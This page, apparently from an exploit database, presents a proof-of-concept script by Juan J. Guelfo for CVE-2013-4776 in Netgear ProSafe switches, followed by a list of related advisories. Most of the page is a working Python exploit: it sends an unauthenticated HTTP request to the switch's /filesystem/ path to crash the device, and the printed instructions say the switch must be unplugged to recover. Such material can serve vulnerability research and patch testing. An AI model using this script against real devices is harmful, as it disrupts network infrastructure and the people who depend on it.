Lucene search
Juan J. Guelfo1337DAY-ID-21150HistoryAug 22, 2013 - 12:00 a.m.
Netgear ProSafe - Denial of Service Vulnerability
2013-08-2200:00:00
Juan J. Guelfo
0day.today
22
EPSS
0.958
Percentile
99.5%
Netgear ProSafe switches suffer from denial of service and unauthenticated startup-config disclosure vulnerabilities.
import sys, getopt, urllib2
from subprocess import *
__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS ([emailΒ protected])"
# Prints title and other header info
def header():
print ""
print " ================================================================= "
print "| Netgear ProSafe - CVE-2013-4776 PoC \t\t\t\t |".format(__version__)
print "| by {0}\t\t |".format(__author__)
print " ================================================================= "
print ""
# Prints help
def help():
header()
print """
Usage: python CVE-2013-4776.py [mandatory options]
Mandatory options:
-t target ...Target IP address
-p port ...Port where the HTTP admin interface is listening on
Example:
python CVE-2013-4776.py -t 192.168.0.1 -p 80
"""
sys.exit(0)
if __name__ == '__main__':
#Parse options
try:
options, args = getopt.getopt(sys.argv[1:], "t:p:", ["target=", "port="])
except getopt.GetoptError, err:
header()
print "\n[-] Error: {0}.\n".format(str(err))
sys.exit(1)
if not options:
help()
target = None
port = None
for opt, arg in options:
if opt in ("-t"):
target = arg
if opt in ("-p"):
port = arg
#Option input validation
if not target or not port:
help()
print "[-] Error: Incorrect syntax.\n"
sys.exit(1)
header()
headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" }
try:
# Get the startup config via HTTP admin interface
print "[+] Triggering DoS condition..."
r = urllib2.Request('http://%s:%s/filesystem/' % (target, port), None, headers)
urllib2.urlopen(r,"",5).read()
except urllib2.URLError:
print "[-] Error: The connection could not be established.\n"
except:
print "[+] The switch should be freaking out..."
print "[+] Reboot the switch (unplug the power cord) to get it back to normal...\n"
sys.exit(0)
# 0day.today [2018-02-17] #Related
securityvulns
securityvulns
Netgear ProSafe switches security vulnerabilities
2013-10-09 00:00:00
openvas
openvas
Multiple NetGear ProSafe Switches Information Disclosure Vulnerability
2013-08-22 00:00:00
nvd
nvd
CVE-2013-4775
2013-12-19 04:24:48
CVE-2013-4776
2013-12-19 04:24:51
cve
cve
CVE-2013-4776
2013-12-19 04:24:51
CVE-2013-4775
2013-12-19 04:24:48
dsquare
dsquare
Netgear Information Disclosure
2014-11-22 00:00:00
prion
prion
Design/Logic Flaw
2013-12-19 04:24:00
Server side request forgery (ssrf)
2013-12-19 04:24:00
cvelist
cvelist
CVE-2013-4775
2013-12-19 02:00:00
CVE-2013-4776
2013-12-19 02:00:00
exploitdb
exploitdb
Netgear ProSafe - Information Disclosure
2013-08-22 00:00:00
Netgear ProSafe - Denial of Service
2013-08-22 00:00:00
exploitpack
exploitpack
NETGEAR ProSafe - Information Disclosure
2013-08-22 00:00:00
NETGEAR ProSafe - Denial of Service
2013-08-22 00:00:00
zdt
zdt
Netgear ProSafe - Information Disclosure Vulnerability
2013-08-22 00:00:00
seebug
seebug
Netgear ProSafe - Denial of Service Vulnerability
2014-07-01 00:00:00
checkpoint_advisories
checkpoint_advisories
Netgear Information Disclosure - Ver2 (CVE-2013-4775)
2018-06-19 00:00:00